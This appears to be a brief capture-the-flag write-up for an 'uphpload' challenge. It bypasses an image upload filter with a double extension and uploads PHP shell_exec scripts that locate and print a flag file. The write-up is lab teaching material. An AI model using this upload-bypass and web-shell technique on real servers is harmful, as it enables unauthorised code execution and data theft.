uphpload
Description
Solution
The webpage allows us to upload images and view them. This immediately suggests a file upload vulnerability.
The page only accepts image files. This can be bypassed using a double extension.
Upload a PHP script to search for flag.txt
file:
<?php
print shell_exec('find / -name "flag.txt"');
?>
Click on the file in uploads to run the script. This gives us the flag location.
Now upload a script to print the flag:
<?php
print shell_exec('cat /flag_is_here/flag.txt');
?>